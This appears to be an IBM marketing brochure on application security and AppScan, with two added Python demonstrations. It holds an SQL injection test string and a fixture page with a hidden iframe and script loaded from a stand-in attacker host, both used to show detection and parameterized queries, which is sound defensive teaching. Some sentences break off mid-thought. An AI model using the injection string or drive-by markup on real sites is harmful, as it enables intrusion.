Securing today’s
applications
Design, deliver and secure smarter software and services
• Define risk thresholds and specify when the security team will terminate application services.
• Categorize applications by risk factors (e.g., Internet or intranet vs. extranet).
• Generate periodic risk reports based on security scans that match issues to defined risk thresholds.
• Maintain a database that can analyze and rank applications by risk, so you can inform teams of how their applications stack up against deployed systems.
Secure by Design
Innovation depends upon the safe and reliable operation of the
systems that will gather, transmit and analyze data,
communicate and act upon the results and advance the
capabilities of highly distributed organizations to unify and
focus on critical shared goals. This type of security, this type of
safety, is not something that can simply be bolted onto the
solutions as an afterthought. It must be considered from the
first requirements to the final implementation, and it must be
inherent in the capabilities that are brought to bear as these
complex problems are solved. The reliability of these solutions
cannot be jeopardized by delay. They must be Secure by Design.
Securing components and systems from their inception produces a flexibility and sense of assurance that fuels the growth and adaptability of the Smarter Planet. Early implementations of smarter projects are only the beginning of the potential for integrating information and technology to solve fundamental infrastructural problems. Systems which are gathering information to optimize a Smarter City today may well be repurposed in the future to bring smarter healthcare or smarter communications to the same area. By designing the core components with security in mind, adapting them to a new area of use becomes much more straightforward, eliminating the need to re-engineer the component for the next role it may fulfill.

Roadblocks to building in security
Among the most common impediments to the adoption of security testing in the software development life cycle, the most difficult to overcome is typically the gap between the development group functions and the security team’s priorities. The skill sets themselves are rarely present in the same individual or even group, and organizationally there is very little inherent synergy. While development goals focus on product functionality and on-schedule delivery, security analysts are often tasked with eliminating vulnerabilities and implementing security controls only after the applications are completed and deployed. Development is rewarded for on-time delivery, while security is rewarded for preventing the deployment of an insecure application. To effectively decrease vulnerabilities created during the development process, development and security teams must cooperate, and in all cases, higher-level management support for improving security during development is essential.

Fact: There might be initial delays to the development cycle as individuals learn the new system, but this is indisputably the most time-efficient method for reducing software risk. The process eventually reduces development time by instilling good, secure coding practices among developers, and these practices reduce time spent elsewhere in the cycle, such as during security and acceptance testing of the final application.

Fiction: We are already doing peer review; therefore, we do not need additional security code reviews.

Fact: A peer review is not a substitute for a security review. Peer reviews are typically used to find functional bugs. Unless reviewers have a deep understanding of application security, many of the more critical security vulnerabilities and design flaws are missed. In many cases, the best-intentioned user requirement implemented without functional error can lead to the greatest security risk. Common security errors will traverse thousands of lines of code and many files, leading to a very challenging, if not impossible, task of manual identification.

Assigning core responsibilities
Many enterprises still find it challenging to identify the most appropriate method and resources to implement source code analysis in their development life cycle. Utilizing a series of workflow models to help guide the implementation of automated source code scanning into an existing development process is the most effective way to achieve a favorable approach. Although it is clear that development organizations
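To make the peer-review-versus-security-review point concrete, here is an added example (written for this page; it is not IBM code and not AppScan output) of a user lookup that meets its functional requirement and passes every happy-path check a peer review would run, yet is trivially injectable. The hardened version beside it binds the name as a query parameter. The in-memory database, the user rows and the attack string are all constructed for the example.

```python
import sqlite3

# Constructed sample data for this example; not taken from the page.
SEED_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    return conn


def lookup_email_concat(conn: sqlite3.Connection, name: str) -> list:
    """Requirement: return the e-mail address(es) for an exact user name.

    This version is functionally correct for every name a tester would
    try, so a review focused on behaviour passes it.  Because the name is
    spliced into the SQL text, the caller can also rewrite the query.
    """
    sql = "SELECT email FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def lookup_email_param(conn: sqlite3.Connection, name: str) -> list:
    """Same requirement, hardened: the name travels as a bound parameter
    and is never parsed as SQL, whatever characters it contains."""
    sql = "SELECT email FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,)).fetchall()]


def functional_review(fn) -> bool:
    """What a typical peer review checks: known user found, unknown
    user yields nothing.  Both implementations pass this."""
    conn = make_db()
    return (fn(conn, "alice") == ["alice@example.com"]
            and fn(conn, "carol") == [])


def security_review(fn) -> bool:
    """What a security review adds: hostile input.  Returns True when
    the function leaks rows the caller never asked for."""
    conn = make_db()
    payload = "x' OR '1'='1"   # constructed injection string
    return len(fn(conn, payload)) > 1


if __name__ == "__main__":
    for fn in (lookup_email_concat, lookup_email_param):
        print(fn.__name__,
              "functional:", functional_review(fn),
              "leaks rows:", security_review(fn))
```

Both functions satisfy the functional check; only the parameterized one survives the hostile input. That gap is exactly what a review that looks for functional bugs alone will not find.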
Hackers and Malware
The proliferation of malware designed to infiltrate computer systems without the owners’ informed consent has become one of the most challenging security issues facing users today. Hackers are engineering ever more sophisticated viruses, worms and Trojan horses that can outsmart traditional defense mechanisms.

Malicious software can be distributed in a variety of ways, and attackers generally do not limit themselves to a single channel. For a long time, email was the primary delivery mechanism, and it is still significant today. Network vulnerabilities and instant messaging have also been used for pushing worms from one machine to another.

Today, web applications are the primary delivery mechanisms for malware via “drive-by downloads” or “social engineering.” A drive-by download happens when a user’s machine becomes compromised simply by browsing an infected web page. The browser executes components that are maliciously crafted to exploit vulnerabilities in the browser, operating system or plug-ins as the page renders images, in-line scripts and videos, for example.

Social engineering is a term used to describe tricking a user into performing some action, such as downloading a file or accepting a prompt. “Scareware,” such as an alarming pop-up that prompts users to perform an action, is a good example of this. A pop-up designed to look like an antivirus alert may read “A virus has been detected on your system” and prompt a user to download a cleanup utility, which is actually malware (often a Trojan horse). In the fall of 2009, a major national newspaper in the United States faced a version of this tactic in the form of a scam that was designed to scare users into buying useless antivirus software.

In recent years, occurrences of legitimate websites serving malware have become more widespread. Previously, cautious web surfers who avoided questionable sites, such as adult-oriented or illegal download sites, could reasonably expect to avoid attacks. This is not so today. Moreover, site owners rarely even know that the compromise has occurred. Consider the consequences. Users are no longer able to avoid exposure through good judgment alone. The malware is delivered through the sites they use and trust on a regular basis—for personal and business needs. Web gateways can no longer rely on blacklists of malicious sites without blocking legitimate sites as well. So how are users expected to protect themselves, and how can website owners avoid putting their users in harm’s way? That question can’t be addressed without understanding how legitimate sites are compromised.

A look at how legitimate websites are compromised
In most cases, reputable websites are attacked using one or a combination of four primary methods.

Vulnerability exploitation
Vulnerabilities on a site are a favorite target of criminals. These
could be 0-day vulnerabilities in the software running the
website or vulnerabilities in the application-specific code. Such
vulnerabilities can allow attackers to deface the site, making it
link to or serve malicious content. Exploiting 0-day or very recent
vulnerabilities in web infrastructure (for example, web servers,
application servers and operating systems) is the primary
method of compromising websites today.
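As an added illustration of the outcome just described (a compromised page that now links to or serves malicious content), the following script shows one check a site owner can run against what the web server is actually serving. It is written for this page and is not the paper's own material or an AppScan feature. It parses the served HTML, lists every script, iframe, embed and object source, and flags anything that is hidden (zero size or visibility:hidden, the usual drive-by shape), loaded from an origin outside an allow-list, or absent from the page as originally published. The allow-list, the baseline page and the "after compromise" page are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption for the example: the site owner knows which origins may
# serve active content on the page.  Constructed, not from the page.
ALLOWED_ORIGINS = {"www.example.com", "cdn.example.com"}

# Constructed baseline: the page as the owner published it.
BASELINE_HTML = """<html><body>
<h1>Welcome</h1>
<script src="https://cdn.example.com/app.js"></script>
</body></html>"""

# Constructed "after compromise" page: an attacker appended a hidden
# iframe and an off-site script, the classic drive-by injection.
SERVED_HTML = BASELINE_HTML + """
<iframe src="http://evil.example.net/ld.php" width="0" height="0" style="visibility:hidden"></iframe>
<script src="http://evil.example.net/x.js"></script>"""


class ActiveContentRefs(HTMLParser):
    """Collect (tag, src, hidden) for every element that pulls in
    executable or framed content."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or a.get("data")
        if tag not in ("script", "iframe", "embed", "object") or not src:
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (a.get("width") == "0" or a.get("height") == "0"
                  or "visibility:hidden" in style or "display:none" in style)
        self.refs.append((tag, src, hidden))


def active_refs(html: str) -> list:
    """Return every active-content reference found in the page."""
    parser = ActiveContentRefs()
    parser.feed(html)
    return parser.refs


def suspicious_refs(html: str, allowed=ALLOWED_ORIGINS) -> list:
    """Flag references that are hidden or served from an origin not on
    the allow-list.  Relative URLs are same-origin and pass the origin
    test, so hidden-ness is the only check that applies to them."""
    flagged = []
    for tag, src, hidden in active_refs(html):
        host = urlparse(src).hostname or ""
        off_list = bool(host) and host not in allowed
        if off_list or hidden:
            flagged.append((tag, src))
    return flagged


def new_since_baseline(baseline: str, served: str) -> list:
    """Diff the served page against the published baseline: injected
    content shows up as references the baseline never had."""
    known = {(t, s) for t, s, _ in active_refs(baseline)}
    return [(t, s) for t, s, _ in active_refs(served) if (t, s) not in known]


if __name__ == "__main__":
    print("suspicious:", suspicious_refs(SERVED_HTML))
    print("injected:  ", new_since_baseline(BASELINE_HTML, SERVED_HTML))
```

Run periodically from outside the hosting environment (so the check sees what visitors see, not what sits on disk), this is a cheap way to close the gap the text describes: site owners learning about a compromise from their own monitoring rather than from a blacklist or a user complaint. The origin allow-list catches content the attacker hosts elsewhere; the baseline diff catches content uploaded to the compromised server itself.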
Existing solutions
How can users be expected to protect themselves from malware on legitimate websites? Certainly, users need to take precautions by installing appropriate endpoint security solutions, such as antivirus software, firewalls and other security tools. But this will only get them so far. As a result, website owners have significant responsibilities in the matter, as their users should expect a reasonable level of protection against malicious code.

Please see the demo of Rational AppScan Standard Edition for a full view of the AppScan Standard Edition and Express products.
SWG Rational Marketing Software Delivery Program
Security and Cloud Computing
Cloud computing is a flexible, cost-effective and proven delivery platform for providing business or consumer IT services over the Internet. Cloud resources can be rapidly deployed and easily scaled, with all processes, applications and services provided “on demand,” regardless of user location or device. As a result, cloud computing gives organizations the opportunity to increase their service delivery efficiencies, streamline IT management and better align IT services with dynamic business requirements.

Both public and private cloud models are now in use. Available to anyone with Internet access, public models include Software as a Service (SaaS) clouds like IBM LotusLive™, Platform as a Service (PaaS) clouds such as IBM Computing on Demand, and Security and Data Protection as a Service (SDPaaS) clouds like the IBM Vulnerability Management Service.

Private clouds are owned and used by a single organization. They offer many of the same benefits as public clouds, and they give the owner organization greater flexibility and control. Many organizations embrace both public and private cloud computing by integrating the two models into hybrid clouds. These hybrids are designed to meet specific business and technology requirements, helping optimize security and privacy with a minimum investment in fixed IT costs. Although the benefits of cloud computing are clear, so is the need to develop proper security for cloud implementations.

In addition to the usual challenges of developing secure IT systems, cloud computing presents an added level of risk because essential services are often outsourced to a third party. The “externalized” aspect of outsourcing makes it harder to maintain data integrity and privacy, support data and service availability and demonstrate compliance. As a result, clients must establish trust relationships with their providers and understand risk in terms of how these providers implement, deploy and manage security on their behalf. This “trust but verify” relationship between cloud service providers and clients is critical because the clients are still ultimately responsible for compliance and protection of their critical data, even if that workload has moved to the cloud.

Infrastructure sharing calls for a high degree of standardization and process automation, which can help improve security by reducing the risk of operator error and oversight. However, the risks inherent with a massively-shared infrastructure mean that cloud computing models must still place a strong emphasis on isolation, identity and compliance. In other words, the framework of governance, risk management and compliance can be broken into five security focus areas:

• People and Identity: Address the risks associated with user access to corporate resources
• Data and Information: Understand, deploy and properly test controls for access to and usage of sensitive business data
• Application and Process: Help keep applications secure, protected from malicious or fraudulent use, and hardened against failure
• Network, Server and End Point: Optimize service availability by mitigating risks to network components
• Physical Infrastructure: Provide actionable intelligence on the desired state of physical infrastructure security and make improvements

Each focus area has its own value proposition and corresponding financial payback that must be balanced.

While cloud computing is often seen as increasing security risks and introducing new threat vectors, it also presents an exciting opportunity to improve security. Characteristics of clouds such as standardization, automation and increased visibility into the infrastructure can dramatically boost security levels. For example, the use of a defined set of cloud interfaces, along with centralized identity and access control policies, will reduce the risk of user access to unrelated resources. Running computing services in isolated domains, providing default encryption of data in motion and at rest, and controlling data through virtual storage have all become activities that can improve accountability and reduce the loss of data. In addition, automated provisioning and reclamation of hardened run-time images can reduce the attack surface and improve forensics.

For more information on how the Rise of Cloud is creating new requirements for Security, please see our podcast.
Security in Industry
Industry-specific software assets that allow you to deploy business solutions with lower costs and risk:

Healthcare: Securing sensitive patient information and adhering to compliance mandates is an overwhelming requirement for all healthcare professionals at every level of the industry. With funding for use of Electronic Health

Please review the case study of an International Telecommunications Company.
Resources

Web Application Security e-Kit
IBM Rational AppScan can help you effectively design security into your products and services early in the lifecycle, in a way which is resilient to change. Download your complimentary e-Kit now. You’ll receive white papers, demos, podcasts and additional information on helping you design, deliver, and manage smarter software and services faster, in a more secure and cost-efficient manner.

Rational AppScan ROI Calculator
Automated application security analysis enables you to detect exploitable vulnerabilities to protect against the threat of cyber-attack and also significantly reduces costs associated with manual vulnerability testing. This Rational AppScan ROI calculator will help provide estimates on your ROI from implementing a web application security testing solution.

Podcasts:
“What, Why and How of Application Security”
In this podcast you can learn how application security strategy and policy can mitigate risk and thus safeguard not only your company’s informational assets but also your bottom line and brand.

“Rise of Cloud is creating new requirements for Security”
In this BizTech Reports podcast, David Grant discusses the new and elevated role application security must play to protect vital corporate interests in as efficient a manner as possible. According to IBM X-Force’s most recent research from the end of 2008, over 50% of all vulnerabilities disclosed last year were related to the application layer.

“Securing software at the source is good for Quality”
Hear from Ryan Berg, Security Architect, IBM, on how to promote secure software delivery starting in QA. Learn how you can ensure that security standards are met as part of your quality measures.

Demos:
IBM’s Development and Test Enterprise Cloud Solution
IBM Smart Business Development & Test on the IBM Cloud is your gateway to the cloud. With an ever-growing list of images and functionality, you can provision, manage, and customize your instances in minutes.

Whitepapers:
Ponemon Business Case for Data Protection (US)
Ponemon Business Case for Data Protection (UK)
The Business Case for Data Protection was conducted by Ponemon Institute and sponsored by Ounce Labs, an IBM Company. It is the first study to determine what senior executives think about the value proposition of corporate data protection efforts within their organizations.

The Right Tool for the Right Job
A range of application security tools was developed to support the efforts to secure the enterprise from the threat posed by insecure applications. This white paper examines the most common tools found in the enterprise application security environment.

Trust, but Verify
This white paper discusses the need for addressing security concerns in outsourced applications. It outlines a framework for addressing these concerns with outsourcing partners and explores the role of source code review and related technologies to assess and certify outsourced applications.

Knowledge is Power
Your software has a lot to say about data privacy. Your software is the engine for your data, where it gets processed, transformed, and transmitted. Understanding what your software can tell you puts power in your hands.

Maintaining trust: protecting your website users from malware
This paper explores the problem of malware and how it is increasingly being delivered through legitimate websites.

© Copyright IBM Corporation 2010
IBM Software Group
Route 100
Somers, NY 10589
U.S.A.
ESW03001-USEN-01